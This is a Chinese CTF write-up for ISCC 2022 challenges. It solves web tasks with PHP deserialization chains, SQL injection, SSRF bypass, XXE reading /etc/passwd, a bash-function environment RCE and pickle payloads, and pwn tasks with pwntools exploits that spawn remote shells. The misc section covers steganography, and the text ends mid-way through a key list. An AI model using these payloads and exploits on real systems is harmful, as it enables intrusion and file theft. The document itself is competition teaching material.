web
冬奥会
传入一个json字符串,第一个键为year,且值不为数字
if(is_array(@$info["items"])){
if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
$status = array_search("skiing", $info["items"]);
$status===false?die("Sorry~"):NULL;
foreach($info["items"] as $key=>$val){
$val==="skiing"?die("Sorry~"):NULL;
}
$Step2=True;
}第二个键为items,利用函数接入到了不符合的类型返回“0”,使用二维数组进行绕过
poc
?Information={"year":"a","items":[0,[],"a"]}爱国敬业好青年2
5.10为共青团成立100周年,猜测坐标为天安门,进入/flag页面,post提交经纬度即可得到flag
post提交
lati=116%C2%B023%E2%80%B2E&langti=39%C2%B054%E2%80%B2N
Pop2022
目标为include。可以使用php伪协议来读取并输出文件。
poc:
<?php
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
//echo 'Road_is_Long__construct';
$this->page = $file;
}
public function __toString(){
echo '__toString';
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var='php://filter/read=convert.base64-encode/resource=/flag.php';
public function append($value){
echo 'append';
include($value);
}
public function __invoke(){
echo '__invoke';
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
public function __construct(){
//echo 'Make_a_Change__construct';
$this->effort = array();
}
public function __get($key){
echo '__get';
$function = $this->effort;
return $function();
}
}
$a=new Road_is_Long();
$b=new Road_is_Long();
$c=new Make_a_Change();
$d=new Try_Work_Hard();
$c->effort=$d;
$b->string=$c;
$a->page=$b;
echo urlencode(serialize($a));
?>
ISCC{lets_pop_your_2022}
Easy-SQL
?id=-8 union table emails limit 7,1#
获得源码
在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据
username=0' union select 1,0x61646d696e,3#&passwd=3
findme
简单的php原生类利用
http://59.110.159.206:8030/unser.php
先使用伪协议获取hint.php,得知flag大概位置
<?php
class a{
public $un0;
public $un1;
public $un2="php://filter/convert.base64-encode/resource=";
public $un3;
public $un4;
}
$payload=new a();
echo serialize($payload);poc直接打获得flag文件
<?php
class a{
public $un0="DirectoryIterator";
public $un1="glob:///var/www/html/f*.txt";
public $un2;
public $un3="unserialize";
public $un4="abc";
}
$a=new a();
echo serialize($a);让我康康!
一个搜索框,提示我们访问fl4g页面,访问后返回403页面,我们尝试一下使用HTTP请求走私漏洞访问fl4g页面,提示需要来自本地
配合搜索框,发现由前端重写的请求包会被反馈在响应中,需要post提交数据,添加CT字段,成功通过HTTP请求走私漏洞获取到了前端服务器用来指定来源IP的字段名,我们就可以伪造成本地用户了
最终获得flag
这是一道代码审计题
访问index构造请求url=1,获得报错页面,查看源码
访问此文件,发现emoji编码的源码,
进行解码,获得源代码
def geneSign():
if(control_key==1):
return render_template("index.html")
else:
return "You have not access to this page!"
def check_ssrf(url):
hostname = urlparse(url).hostname
try:
if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
raise BaseException("url format error")
if re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
if judge_ip(hostname):
return True
return False, "You not get the right clue!"
else:
ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
if is_inner_ipaddress(ip_address):
return False,"inner ip address attack"
else:
return False, "You not get the right clue!"
except BaseException as e:
return False, str(e)
except:
return False, "unknow error"
def ip2long(ip_addr):
return struct.unpack("!L", socket.inet_aton(ip_addr))[0]
def is_inner_ipaddress(ip):
ip = ip2long(ip)
print(ip)
return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24
def waf1(ip):
forbidden_list = [ '.', '0', '1', '2', '7']
for word in forbidden_list:
if ip and word:
if word in ip.lower():
return True
return False
def judge_ip(ip):
if(waf1(ip)):
return Fasle
else:
addr = addr.encode(encoding = "utf-8")
ipp = base64.encodestring(addr)
ipp = ipp.strip().lower().decode()
if(ip==ipp):
global control_key
control_key = 1
return True
else:
return False构造请求http://59.110.159.206:8040/index?url=https://@MTI3LjAuMC4x
绕过ssrf限制,获得新提示
访问此目录,并抓包更改cookie为题目所给
登录到登录框界面,右键查看源代码,得到一串js源码
很明显要我们构造post数据包,存在xxe漏洞,构造如下
POST /mti3ljaumc4x/codelogin HTTP/1.1
Host: 59.110.159.206:8040
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: td_cookie=2450783275;login=1; a_cookie=aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==
Upgrade-Insecure-Requests: 1
Content-Type: application/xml;charset=utf-8
Content-Length: 172
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<user><name>&name;</name><password>admin</password></user>成功读取文件
根据提示利用proc特性,proc/self/cwd/获取目标当前进程环境的运行目录与目录里的文件
读取proc/self/cwd/flag.txt文件得到flag
ping2rce
环境变量rce,可参考p牛的文章https://tttang.com/archive/1450/,直接构造poc即可命令执行
POST /cgi-bin/ping?ip=127.0.0.1 HTTP/1.1
Host: 59.110.159.206:8010
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 152
Content-Type: multipart/form-data; boundary=cf7fc1d68a5861b16bd95126c45ba379
--cf7fc1d68a5861b16bd95126c45ba379
Content-Disposition: form-data; name="BASH_FUNC_ping%%"
() { cat /flag; }
--cf7fc1d68a5861b16bd95126c45ba379--
Melody
先随便登录一个用户,可以看到存在session认证
eyJ1c2VybmFtZSI6ImFkbWluMSJ9.Ym89BA.cTzCdduJBZkB49voYggktxppsnI发现提示/info页面需要使用Melody浏览器登录,更改UA头为Melody即可
发现junjia2模板注入,查看配置信息,发现session_key,那我们接下来直接伪造session即可
获得key:meldoy-is-so-cute-wawawa!
然后使用脚本进行flask session伪造,替换session后登录成功
虚假的flag,发现一个py源文件,访问下载
代码如下
# -*- coding:utf-8 -*-
import pickle
import melody
import base64
from flask import Flask, Response,request
class register:
def __init__(self,name,password):
self.name = name
self.password = password
def __eq__(self, other):
return type(other) is register and self.name == other.name and self.password == other.password
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module[0:8] == '__main__':
return getattr(sys.modules['__main__'],name)
raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
def find(s):
return RestrictedUnpickler(io.BytesIO(s)).load()
@app.route('/therealflag', methods=['GET','POST'])
def realflag():
if request.method == 'POST':
try:
data = request.form.get('melody')
if b'R' in base64.b64decode(data):
return 'no reduce'
else:
result = find(base64.b64decode(data))
if type(result) is not register:
return 'The type is not correct!'
correct = ((result == register(melody.name,melody.password))&(result == register("melody","hug")))
if correct:
if session['username'] == 'admin':
return Response(read('./flag.txt'))
else:
return Response("You're not admin!")
except Exception as e:
return Response(str(e))
test = register('admin', '123456')
data = base64.b64encode(pickle.dumps(test)).decode()
return Response(data)pickle反序列化,写脚本,pker进行原变量覆盖
import base64
payload=b"c__main__\nmelody\n(S'name'\nS'melody'\nS'hug'\nS'2'\ndb0(c__main__\nregister\nS'melody'\nS'hug'\no."
print(base64.b64encode(payload))
pwn
create_id
32位程序,有后门函数,结合格式化字符串漏洞
from pwn import *
context.log_level = "debug"
io=remote('123.57.69.203',5310)
x = int(io.recvline(),16)
print(hex(x))
io.sendlineafter('You will get the user id after you finish it.\n',str(1))
io.sendlineafter('incorrect\n',str(1))
io.sendlineafter('incorrect\n',str(1))
payload = fmtstr_payload(10, {x:9})
io.sendlineafter('your name?\n',payload)
io.interactive()sim_treasure
格式化字符串,没有PIE,泄露打got表
from pwn import *
context.log_level='debug'
io=remote("123.57.69.203",7010)
elf = ELF("./sp1")
libc = ELF("./libc-2.27.so")
puts_got = elf.got['puts']
payload1 = p32(elf.got["puts"])+"%6$s"
io.sendlineafter('Can you find the magic word?\n',payload1)
puts_addr = u32(io.recvuntil('\xf7')[-4:])
printf_got = elf.got['printf']
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
io.sendline("A")
payload2 = fmtstr_payload(6, {printf_got: system_addr})
io.sendlineafter('A\n',payload2)
io.sendline("/bin/sh\x00")
io.interactive()
跳一跳
栈溢出,需要泄露多个地址、canary,-,+会被%hhd识别,但是不读入
from pwn import *
from LibcSearcher import *
context.log_level="debug"
def ret2(leak, func, path=''):
if path == '':
libc = LibcSearcher(func, leak)
base = leak - libc.dump(func)
system = base + libc.dump('system')
binsh = base + libc.dump('str_bin_sh')
else:
libc = ELF(path)
base = leak - libc.sym[func]
system = base + libc.sym['system']
binsh = base + libc.search('/bin/sh').next()
return (system, binsh)
io=remote('123.57.69.203',7020)
libc=ELF('./attachment-10')
io.recvuntil('~~\n')
for i in range(0x58):
io.sendline('11')
for i in range(0x6):
io.sendline('-')
for i in range(0x4a):
io.sendline('11')
for i in range(0x6):
io.sendline('-')
for i in range(0x1a):
io.sendline('11')
for i in range (0x6):
io.sendline('-')
for i in range(2):
io.sendline('11')
for i in range(6):
io.sendline('-')
for i in range(0x3):
io.sendline('21')
io.send('a')
leak_data=io.recv()
io_stderr_addr=u64(leak_data[0x67:0x6d].ljust(8,'\x00'))
setbuffer_addr=u64(leak_data[0xb7:0xbd].ljust(8,'\x00'))-231
libc_base=io_stderr_addr-0x3ec680
base=u64(leak_data[0xd7:0xdd].ljust(8,'\x00'))-0x10a0
leak_stack=u64(leak_data[0xdf:0xe5].ljust(8,'\x00'))
canary=u64(leak_data[0xe8:0xef].rjust(8,'\x00'))
result=ret2(setbuffer_addr,'setbuffer')
sys_addr=result[0]
bin_sh_addr=result[1]
pop_rdi_addr=base+0x130b
leave_addr=base+0x124a
payload=p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(sys_addr)
payload=payload.ljust(0xd8,'a')
payload+=p64(canary)+p64(leak_stack-0x1d0-8)+p64(leave_addr)
io.sendline(payload)
io.interactive()unlink
修改strcmp got表,得到后门函数,构造参数,自动被后门解析
漏洞函数为gets,使用堆溢出
from pwn import *
context.log_level='debug'
io=remote('123.57.69.203','5810')
elf = ELF('./pwn')
def addent(index,size,data):
io.sendline('addent')
io.sendlineafter('Index: ',str(index))
io.sendlineafter('Size: ',str(size))
io.sendlineafter('Data: ',data)
def delete(index):
io.sendline('remove')
io.sendlineafter('Index: ',str(index))
strncmp_got = elf.got['strncmp']
addent(0,0x70,'')
addent(1,0x40,'')
addent(2,0x50,'')
addent(3,0xf0,'')
delete(0)
delete(2)
delete(1)
addent(0,0x70,'a'*0x70+p64(0)+p64(0x51)+p64(strncmp_got))
addent(1,0x50,p64(strncmp_got))
addent(1,0x50,p64(0x400896))
io.sendline('/bin/sh')
io.interactive()
untidy_note
UAF,堆溢出,堆块不允许大于0x20
from pwn import *
context.log_level = "debug"
p = remote('123.57.69.203',7030)
libc =ELF('./libc-2.27.so')
def sa(delim,data):
p.sendafter(str(delim), str(data))
def sla(delim,data):
p.sendlineafter(str(delim), str(data))
def sl(data):
p.sendline(str(data))
def itr():
p.interactive()
def dbg():
gdb.attach(p)
pause()
def add(size):
sla('Your choose is:\n',str(1))
sla('the note size is:\n',size)
def delete(index):
sla('Your choose is:\n',str(2))
sla('index:\n',index)
def edit(index,size,content):
sla('Your choose is:\n',str(3))
sla('index:\n',index)
sla('the size is:\n',size)
sa('Content:\n',content)
def show(index):
sla('Your choose is:\n',str(4))
sla('index:\n',index)
sl('111')
for i in range(7):
add(0x10)
delete(0)
delete(1)
show(1)
p.recvuntil("Content:")
heap=u64(p.recv(6)+'\x00'*2)-0x250
print(hex(heap))
edit(0,0x10,p64(heap))
add(0x10)
add(0x10)
add(0x10)
add(0x10)
add(0x10)
edit(7,0x20,p64(0)*4)
delete(5)
edit(5,0x10,p64(heap+0x20))
add(0x10)
add(0x10)
edit(10,0x20,p64(0x0000000007000000))
delete(7)
add(0x10)
show(10)
p.recvuntil("Content:")
base=u64(p.recv(6)+'\x00'*2)-0x3ebca0-0x240
print('base:'+hex(base))
free=base+libc.sym['__free_hook']
system=base+libc.sym['system']
print(hex(system))
edit(10,0x20,p64(0)*4)
delete(10)
edit(10,0x20,p64(free))
add(0x10)
add(0x10)
edit(11,0x10,p64(system))
edit(10,0x10,"/bin/sh\x00")
delete(10)
itr()
misc
2022冬奥会
猜测解压密码为灯笼,解压获得flag
单板小将苏翊鸣
更改图片宽高,得到二维码,扫码获得密码
密码是奖牌总数 金牌数 银牌数 铜牌数 解压密码15942
解压获得flag
隐秘的信息
题目给的密文使用base64解码得到压缩包解压密码,解压后得到一张图片
使用stegstolve分析得到隐藏的16进制字符
先转为二进制字符
在转成字符,删除前3个1,得到flag
藏在星空中的诗-1
ps打开文件,调透明度后出现顺序
13524按照顺序将图案带入winrara解压,对照表格按顺序更换得到flag
藏在星空中的诗-2
先对照藏在星空中的诗-1的表格将图像转为hex格式,在将其转为Unicode编码即可,最终解码得到flag
flag="\🌟🌠🌠✴🟉\🌟🌠🌠★⍣\🌟🌠🌠✴⍣\🌟🌠🌠✴⍣\🌟🌠🌠✧≛\🌟🌠🌠⍣⍣\🌟🌠🌠✴🟉\🌟🌠🌠☆🟌\🌟🌠🌠⍣✴\🌟🌠🌠☆✯\🌟🌠🌠✧🌠\🌟🌠🌠✴≛\🌟🌠🌠✴🟌\🌟🌠🌠⍣☆\🌟🌠🌠⍣✴\🌟🌠🌠⍣✴\🌟🌠🌠✲☪\🌟🌠🌠★☆\🌟🌠🌠⍣☆\🌟🌠🌠✧⚝".replace("\🌟🌠🌠","")
flag_unicode_hex=[str(hex(ord(i))).upper() for i in flag if i!="\\"]
flag_unicode=""
for i in range(len(flag_unicode_hex)):
if i%2==0:
flag_unicode +="\\u00"+flag_unicode_hex[i][-1]
else:
flag_unicode+=flag_unicode_hex[i][-1]
print(flag_unicode)
降维打击
首先使用foremost提取图片附件
得到新图片
然后使用zsteg分析新图片zsteg -a "b1,r,lsb,yx",在提取隐藏信息zsteg -a -E "b1,r,lsb,yx"得到一张文字图片
在此网站对照文字,得到flag
https://www.bilibili.com/read/cv8724055
ISCC{ZEDD-EJHM-KNVM}
套中套
010editor打开,将文件头修改成png的文件头,并修改照片高度
Figure 1:
Figure 2:
然后在文件末尾找到了一串base64编码,解码后得到flag2:_ISCC_Zo2z
直接对图片截图,接着用stegsolve 打开这张截图 然后切换就看发现flag1
Figure 3:
得到解压密码:wELC0m3_T0_tH3_ISCC_Zo2z
根据解压后得到的generator.py文件编写脚本如下:pubkey和encoded内容是压缩包解压后得到的文件内容
pubKey = [24711277289455805071082183921144414032582753663573146469690760085918988346282287830925440309641574970837122386670243171683088155559238888879589465620187779156722578866277244839846688585479196, 8331342674634579788187066694536982163316001309813524371617575401438981756213646261714664444979049172993827679059994325931829820406248619183121063046359168137539946177441258548198381042506623, 37703954458339783215182402838858898442104300800502847019310017886763632326958244079374887169631622937188935937560635479222556228345922043876878912006330280400021181064023528428229021383998773, 25945844358709395918619063088903632951477946913663605727390703353781460648598193122979795324054791877587120519204436132166734684859520681257026335668408205578299876294763586571517340099833251, 46617796408457800169802970506008979749949755415344267530184000035045033930599177801417568531348337113951787988075042216831770929779149620046070943604233228701354336451430773154133861987749736, 42327880776629974121037465864835269480416131528553513676712544339274319407214439082635821738006051597102762475984356192961043234567645210948258511362083821220049393631612535119736190230505079, 22589508873462778330480725281334942556920040122718087013134335609054373022750940493907481894041761451500933602254201267626587716133274536950322527863347103390866567700839589023665853744176166, 49012245620167849002831231356902229194157957266486347984277724206214957520359694455291662818602399440527235773250855790121299923414792428085214736131229263074041971520146812818292757283873972, 50505294007387374356187011832999770420942567192611311152519245434155214975329620482872555711095896003177127425845837803400857344978100153324725001556125905437698323475597576788218126161099748, 34414786369900765425214990265206529100837523490988350328499535711172031795804372249788550156161478651816329269889968144030583108248751740619681030774787866493158241605226717696519397656928761, 5502680605412473949454545822542086565207206020304695803386351464931798180745299614793446981159878475871947667524780863633062822368011961917121718991914199133807397897209943082470470090855239, 9983311781614144459946114456331704088107639087097626233450958945692605583507051189547829807304454244438044518594916557943389434148863316112458522629232887473171898243371185747762751823927947, 48595344374998502475371076864600970857905298177970136849177794628315586457194537343102046554336867973271712237460686037428475343416532023474688245581528647040159995621526996436779938514083176, 30454044156600685547012361559528681837862663453766414789613678283059618403587081733150542831360841363729852732400590613716299519010668812729035958444961137248573111009009383052804127453631029, 29262465032576518257676026674076229615092607424499500332652757724283094828286106061934536663326477468236600903584605319876120398091060431915056800709813964618546529513946627290425530263151785, 58185916880654264057610847400993593764760105195559718130914887205667627960557861087272445125027305651241372181116022684217422418467491370778628349874535569764190295247016711254931516685468763, 50921877714800544475632450382663873906375610195117639257647328721148735828096477553253402935403941670891094883705610281862715168903139696245286876582609952598151293850053015830379511213972743, 38666998055817743159315776056038793353694644727484775020315432289017565065508607748180887543997777917674564556433615026286429388346922382550025360849523093169561551332244159493719912059781747, 2618433286435944949991686140343101299794881415225422420328973994756674163460246534976704295474642810788091225332813529196514409401028062132727458892297854618591225064139465121144529214787359, 15480360531471643031574551152063675696371174191802025724204527356937457630739509894172219260947369397642717350574189853163983085630193129264991869792533078518435439873596650874449441676462668, 58602755253467326614029454783001663335922655777271770463533491628284000847218760267942717989253811387794064666939321561082896879847104642223475122351990487064856802357742730475539596891046692, 45168901123765244366991602858072030788922012241759967936935800489295253946084124106950261327937372194753304110979424196891136037000437320540563517970728380740700665590309964696933950533768952, 53095220066787807649094688415293583022426300394279421659984006465439017324791757144036815940148125279160663621726851858919264911024418507573076327932777107133556897824458372268197339351996050, 7678913185720959224047113283074762966863107257800639648979005678996248105320726214014045806477516899572209637951171447194990910321009220926072297492552801113592628268168399993433574593468502, 37959167582142866022915755986516747311215397821143293846538370998334979797451952481900560704924212988331999767036435777857836921012939210300341751727693548094496560256667712513408836716151074, 42545651517052026953249976733757718747130734598590641325774938685131495452170811885054225996530481032917830345573501191848318085310680273722163386097519639838241428199477437118408178621714090, 9610398279793845223820268953510232729434113393447557999421324995891410814235346759722388316420086296823885985383986638804541574127436150632247129329642747382993402273123828606362086318506545, 19744463887853987506188522688256493351113392479139564742274843195446027734615303020507489136276819812156933775184303608853288797112385962842355566409118478523637667689401510327050155689808963, 4979725803451704682802880425760671801962766594838959346702420024010102650906378175453619080006362724140800969629231682256658227953985378988108718052114334610337888358558164563679074179033934, 14668926421930473155760358387668904656497776501581195022959128573164793788948794457559050645601182951043234342754812273237061242925319104145642020731124457228317607584856514851170615444585585, 65460455002095463508301635207629900022172062603490940057644254400602061418400712297851174032682485882152324214175826165198187099415985297071102776139652984105656201824622553650351799670588945, 2661582533837323983338590062273864301520364357326397920797454944448601911987473465460828367531110033944206117854888428975522476433664338677957019186057110810519534270822863250691457027593044, 12779538505968702708943253328588728814163836032044638747479959239567449619129948012323703553074068191861884355252056415586155135230805815334700683270866487727255569344526622102605049252079197, 61850420362081340308749776345287798149061549939713451598686569595944195998479323930424617090021990637343593584275285296073664530610784418964777622558593896220355098893449991046432197436590815, 55625447034346997655074779792845329848809970234865960498575324169373167970644250275659589291416779330651965190925772334134206502201511955295465581204246482599158834755828739181504688410920090, 14904416005293582561987587212996876960447129876275219980351894584893221270898227205432948845449024712153119872936901283208094580739338490281888647967290861290740157152083915985337434978775904, 22124674754977812834516102854378858529050297803781298797684567461794296685433530240042006429346019294626453914904754425265053037676951997297488874191557784738147055187532517864892027545298315, 18846351874932455622296051092933876028586499884893900742644639816966464207437422678519642330669038978839515093500362729871914197160713556726040506000368526650143519884877363746788961859989132, 22621081149159015032567107719504347553695386923914299415914444288427632487375293596913741307338667796227951565057968083909077066212716991784793985426486838103686411659077034844503176126567789, 12841230998641798116266593207198166735649244492468830162894469944312052458513299045512671494847852308192790180827409763300150170518414022443797443862609024112812965192094711713497604266811617, 10120786799092778094362830067718923842287649317231090770753807189327548106271431002352232816195303298621999022897198457071919114192622014766892543765787280919930815665277147113583396384891114, 41058266319171356374485005618004422265584323710442517247462290624711242578501950124337337997903722834505655714173946372357388396919574021230083882069680153932985831403137524643030385483815800, 52123283472128316976708419634197224071433654547106397460579199293819026350322017651507957133210688435669095244293484184128258366381757433420307988730493665490856056537033979057193480998097763, 61517000967319117566171338221047330324581806374237642231312875833519844079258930787946797082344032110584013134544810839209391074579550421215971726155645956597376068740958698177283737732404827, 16226604739632728375919222595116206334428679353666170449035928991694074630451995163679983802354971368824866433579166025208076428816325748310550403150758192348214760885159116096572525662760101, 66426425703890778075927785969483365267871617675478998065442032710527705903907361434181820023570278730664036493302248694491694073172393569278385741463905464555180447947933938943615052818914183, 2947564769556925319605959230538793663161870226300339519130608498491408776005940198508419841645157582994321121394440225564853852393337606976093752663624776361514402935785722131835098911019403, 29816961646282465976871364104247457927102559081322327721155071385836502816923727268294499430672418815779732053170563814985562872882795933257469163203884659053514988942243178662463188473560295, 2713256216439803749984745895883483863952318758610018250131057573305530374971962615309909225198562619133130194827974264753823687992661761964310791098240593066207346880490695957421285463229107, 9906406334259491146060090196683892489547514234204990430106964503003373179888829787258114325914992191404949463656338508958892876160026312166073788573774288884298018374397303417515521550874150, 54078365793471170140706398796482723868912019038932006275612991202898210325420801183085594405855422507784857365409739547446932223618994314666308619625607987065241502787668992018127962676453483, 20425258677566388400912100957010635842875551938090144574742090980338723925871671882983711166825955421780045924200051850032551916322744543801463085092679158306683258681851505253236948766096106, 33816927193695390021414032401370645373989155036526734515033932429919806358294318423819171837921987915043087186128426177099169163296711457158104374953267011983220034856739201608000795916220084, 22569299706678947064255422911862640664856797506312373134548043143421083056014082136976443234929238934530769251439415905536981559503030264419438070337446106897917782723316841612257532657185840, 60906061769168077951867268304990727455655069877679725265746099100443735874434337363253226597928623916492866603740428700253802610974356684244729994359250955321825806491119397784967620301958162, 61683560492394868273238752217563827909261070437626043044351411081967771518960115227142799898401153293711484529338725744416210848469542659309555786764343106036543284325064978872324776912148336, 50356345233672398555575161883902863039608856563116994194514401421843004097316661791434165508110209485393309699728137647946332880092630169453933776956614977163140290579875896856914867943995366, 57501896087761221000564375757697136810592110930362342648371860401388353885180289214991062858384258865103093846911709029759241601933198727412147772047933274371847299271752509256524812106942250, 12737830521940166510518732614385010900798810502108660291643561432683743269526526847655249815296395869028388694217745935835462182303969283228700066381443353698625850151497471530674890948180993, 52730525322722654713921376964199238474033765608452650504653597312254899581487280672905721240683884524603750141189731290600453246408181070974974158931451326099247674578886059184134025793063868, 5832179034817012236650369797643672435211585032058945177743488719550712649689612351275237337336471079142829651870904093420916141481654235729551073585642892827115226656310606860460600288273655, 62535517575239814174667016568701230794852349969893721013796460627994219128629091861568486936466709698436018363828881128925403900911271449183538857896542035146017269134876848846262990161045234, 62674735529087559354407464038166154727326545572349224291590487213027570707946522267599386119190546292564063533831451739927875419572436144686502560587414111351387107075097956297382503773821605, 50231775288091956263035747878014492829481430248806106216294196040661117899719475382706042952817219810195452729807556678800903374695753170238793075426601197698713622896760402323336733722892457, 66016703624038041271066616941982890762300212198964544029720194993794639127975468101951537864014124274077320069820145004837891079794854747265683579064037448180401326235378152083537351893156223, 2496511842088422406097481800700154417846766004058284282880930570445186794868220752320999581794041120993227584166556524200479566958726138416756301263459458317338037665782200880712313529579524, 52646872632807334416860779432858640539375423228734617646469622709212835705722292347344358678684546207133845232106873627106705739596352075500857832725750858846569694186453572113172665960017652, 39646370252597198496565236102395427848407572580777108324794151271108081384633913864988168655760133387616118209994149416248124886441795495337768092942063220264859382839551951956893925922412134, 66763103206507486137915061914140088421709328069132507765797646700896492046866661406014319733770194930344476690676065063551966262168442474623889019282388949237941611205500498651223291756556086, 30905411916496490647412235950903360870799765548925132745231965669523205205526281555385893805493026281813975250361982091674522643825764888431268279695491360788418367996590337791641197136530928, 36802978383179633045602430175109758511698299036619412838234669610566632506407215718193693455593330403355905832136364706436478063342628406408423151803944813143750407470940914920265832395392001, 60194749394567132016931527223219221042651662116186510587392574598776808636622825172727654207485891941119029919178746441914434963823676756278931330235015964449860965967208494559221500283783040, 23357944960436444392734443389914040506104019640222393290351361988571689390092415558252707718277689369116844128476481036173738922358780605908966379866637105124707173167456714851636013548156739, 14413839339813812319199177166631152261901064711697106835523633830127181361479752535713717720721786075848232234737506977642328333152855488589275858257180278117734620887231016551096332909708647, 63623661091573663419092333077483294513125186988059499936797498945468023816545390708028673599803856000968509633239781485507821105927858868446051126441796952476590488222951683516934788195889963, 47173449672743681102493035677250432660900249391635411883186020982453858441259109812035644083109944719089237624902661190762915664778776463391384519521965033263461250935422119735050908678746124, 23898959454761699951321644342304976175952138299965456468728190477778225149676091931661794316036592189799061007664186888208998219451627854766298682041388770663736583846033670421901199977051411, 56939465507988310684111686507506864403334446260627101558693334520107599582228641195271877482759620303590720056336457467988941316333304541105000907921837480484760039333140714011944997919780636, 57706995827795099322874578236777361637931874707512085328096497850678167529225293754831192001359772520324244402768868076922243301593839657238176101913755401558771628533307197747939433327739357, 59085290173525715274883679181022755626358508525268408133006681403578109907823591218117894685916748218664618156600085708664767942527566222387600125996268497328797162074351708067688299291381563, 40724438992892642016068593942376539944990640030896442125862163295959034803198543039444007102414294992187153524879384818314714965874051460224743541457322201510121319241395627910136543236765269, 9885341381437913020797374114635635157797978318582858745976562761293377897211673386882866982483379152013393705353804659045661846206847102990751829482196178225485544173780798512708262635703137, 42002669955588701846417038940446418629043958073383584745602327041218973407801520482502048385068132376226181082957198557183099735613370398617648713379368136173014433947040712584842132565864809, 25125663990409955127958261559236512499160636662164598599968685249425762965432303284595504718678127834797999144615563347280922038639955929277491432423108198416295109177311644956378899286345151, 52043232111994440152170692751454337323710074655550707818713027507474996117332369275747048022256132519888015600476206150533420139611662074182758887314859751780004242390813999427167134873641489, 21164222904289898583200820230475470937832140078018589456006171221104992588029054270268844445513562633190468248317703743737856297960575866226387062814079680174853254778194574592880561679849321, 15702484615088500815369257827128964783741741236771912266664290661364568194649397469203268785140713546356732952569078861591717555292723304000727339554606906925957856479912345844412702333471365, 10865661251463028269594251527245143343667168817630466243933504255371484048555805440670555614154552108640243768578016581085840046572631906358622366070304538652262695752078134210026057585627918, 2848803623223996890657483211411398077478034985158329263137805600265521902541279192423825859542373133279622786546289736320500383625468714866606412997145169115584444614405591903631064849794838, 43064052364850657153799843048226216904413929532819108475573315194785770905238536117687580944885663773490036328092028409381170318943961988990509994701842228728111323362261400085835856335640347, 63990489176463655630916454653915259090817137481628354169177456232363892666174474468571272039198941019634065551588057378319563646786876536038530167422740816457574069025123874247946420378990978, 20536210103644890440196110659064359071736314904570034779280012207392765984806670293915911314747448059549956521041198910598380251418835027301696553899752401455805786429802889562461551573414835, 48688018205736289829437263548318254081521429916953442860256279463165884722368083232628566478243179223565846730779664230689398112194883125689324606238190271377157029330565187921034701085881412, 24650194985355153552198357593808130629042232388997475934142482180581413670301249765850321594340946693817059933786961129401164409678075708675654670414449498423805470300868883980543108273057191, 38162810917870423497415976195550985283843950680529049352287989443837834607427430908386227981760607012468966076309297964621061969525433491089809297256537209996590034089705613494609971414942483, 16106661412350506424003000819671696402573350097591091267469051557299003724836803927381506823541750712076867906278238744458399104508171739612500841120601902731190037252983961964270369478250135, 60717008689247973968781938908566004496180475295144030364468903344435573439513131353777950673379589823683156482940320368719840535307811939182548209068851585456944960601918613118057278691443843, 57882240905969595582166302623532199536967394873129928940872411621111224766922438484933075842178960723921646374080389455787308593783246149991904442287560715779178925080106931972299586979959953, 12061826536513185869260563532670900297362162236282900029931589855777340428534398586928322428305858525536948501230868891250447684672637900859825530841033648726270215853767105468881462766353647, 40973633971153999167540984043398551153130298337916277287184472612550851536816203105848218587839346694510913994031730070798708511216239645963193961083872326468979562529128797727840639098996831, 25190964043610225574969743147281492438276087947398074376921729347532928885807409753830940977173209614701838033744898224166579262470797747208929440196369133055839958296041729070928084928175397, 23085492771770494644509788889915907342680818144147360119437564563164180950856851904291430723050735715720034055261306070039381175120138832656617084745093517302210431379995787153962673396950446, 1937286375866702470033764597194175817538611841028892680723733464978386442218526149097443771018354033246248121985191264427707436520669150306012229684753815587120632879284603625150768954590725, 57668655807108259615437079174326332892999147524507134641048100122456123589342568481735509156000192574732309053941159985990102188395289859827445761194795514225271513965790503406398879250946020, 35198545820474489569899848069249557859170666517373907458835345371345885779724027455048887305989157801081342610829321715939227090350286603804194859507448972973163229187760810563747030534930096, 2680837408459670214531068863211655690161634979199681308665046291376585209054365216866169377888301551485329985613646031207005581077478836769647505836036847408127664883863678654156379263672346, 12121350007979822308927681064432222683457135471774074095342842220722850481125191571362576595891866927101566205385910418597553030873994196798229835399838952671263905444731701933770406420792121, 4957631799318318039287713537332279724312547937403771431018555605386508208230343165704781613086526046297842296986943480338666436341519107096931707271246707069346795647588239516143515089036499, 35549534355465956154494768947760967550998727688555042974552178207809004983427424921103316720643881947201408505005591186968625102168923059623511112094217632912471836757511264755862703270341997, 52110172792858889942550084958723550101567576170513478250074784092459757017185078051587972765023896269497260859190340089967413958256099639411918402705603770318443799706825579668789545784614306, 21979260423626821018489541432634891685215725203513830851598610785031805881508993329398466374053154095270019921311344755282533940013298535097200167881351776957252298149312359379466488394766334, 